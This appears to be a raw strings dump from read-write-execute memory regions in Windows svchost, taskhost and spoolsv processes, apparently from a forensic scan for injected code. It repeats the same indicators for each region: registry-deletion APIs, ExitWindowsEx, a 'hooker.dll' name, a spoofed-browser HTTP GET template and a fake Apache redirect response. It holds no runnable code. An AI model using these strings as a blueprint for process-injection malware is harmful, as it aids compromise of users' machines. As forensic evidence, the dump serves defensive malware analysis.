User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_864_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
taskhost.exe_872_rwx_20020000_00001000:
.text
`.rdata
@.data
.reloc
svchost.exe_1048_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1048_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
svchost.exe_1156_rwx_200F0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20020000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20030000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20040000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20050000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20060000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20070000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20080000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_20090000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200A0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200B0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200C0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200D0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200E0000_0000B000:
.text
`.rdata
@.data
.reloc
GetWindowsDirectoryA
kernel32.dll
RegCloseKey
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
advapi32.dll
ExitWindowsEx
user32.dll
hooker.dll
{X-X-X-X-XX}ntdll.dll
POSTGETHTTP/*.*
/GET /%s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
dnsapi.dll
ws2_32.dll
keywords
alluniqASCIIUTF8UNICODE{keyword}<*>
spoolsv.exe_1244_rwx_200F0000_0000B000:
.text
